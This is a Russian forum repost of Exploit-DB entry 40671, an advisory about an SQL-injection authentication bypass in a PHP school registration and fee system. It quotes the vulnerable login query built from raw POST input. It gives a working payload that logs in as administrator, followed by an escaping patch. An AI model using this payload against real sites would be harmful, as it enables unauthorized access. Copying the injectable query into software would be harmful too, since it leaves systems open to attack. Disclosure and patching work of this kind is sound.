Exploit School Registration and Fee System - Authentication Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
40671
Проверка EDB
  1. Пройдено
Автор
OPT1LC
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2016-11-01
School Registration and Fee System - Authentication Bypass
Код:
# Exploit Title.............. School Registration and Fee System Auth Bypass
# Google Dork................ N/A
# Date....................... 01/11/2016
# Exploit Author............. opt1lc
# Vendor Homepage............ http://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/hemedy99/bilal_final.zip
# Version.................... N/A
# Tested on.................. XAMPP
# CVE........................ N/A

# File....................... bilal_final/login.php
---------------------------------------------------

		----snip----

		$username = $_POST['username'];
		$password = $_POST['password'];
		/* student */
		$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
		$result = mysql_query($query)or die(mysql_error());
		$row = mysql_fetch_array($result);
		----snip----

---------------------------------------------------

Exploit 
-------
You can login with username and password : administrator' or '1'='1 


Patching
-------
You can use one of function in PHP : mysql_real_escape_string() to 
---------------------------------------------------

		----snip----

		$username = mysql_real_escape_string($_POST['username']);
		$password = mysql_real_escape_string($_POST['password']);
		/* student */
		$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
		$result = mysql_query($query)or die(mysql_error());
		$row = mysql_fetch_array($result);
		----snip----

---------------------------------------------------

Credit
-------
This vulnerability was discovered and researched by opt1lc

Shout
-------
My Beautiful Daughter & My Wife

Reference
-------
http://php.net/manual/en/function.mysql-real-escape-string.php
 
Источник
www.exploit-db.com

Похожие темы